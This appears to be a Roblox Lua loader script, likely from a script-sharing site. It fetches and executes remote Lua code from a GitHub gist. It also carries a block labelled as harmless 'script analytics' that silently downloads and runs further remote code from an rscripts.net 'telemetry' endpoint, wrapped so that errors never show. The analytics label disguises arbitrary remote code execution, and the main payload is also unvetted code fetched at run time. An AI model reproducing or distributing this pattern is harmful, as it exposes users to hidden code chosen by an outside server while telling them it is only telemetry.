--[[rscripts:analytics:start]] -- Script analytics (enabled by the creator on rscripts.net). -- Runs in its own thread and cannot affect the script below. task.spawn(function() pcall(function() loadstring(game:HttpGet("https://rscripts.net/api/telemetry/v2/client.lua?s=6aaaa59b67057626de2b5d2b"))() end) end) --[[rscripts:analytics:end]] loadstring(game:HttpGet("https://gist.githubusercontent.com/raw/5e9d2784424798655f751803b088030b/l_874787.lua", true))()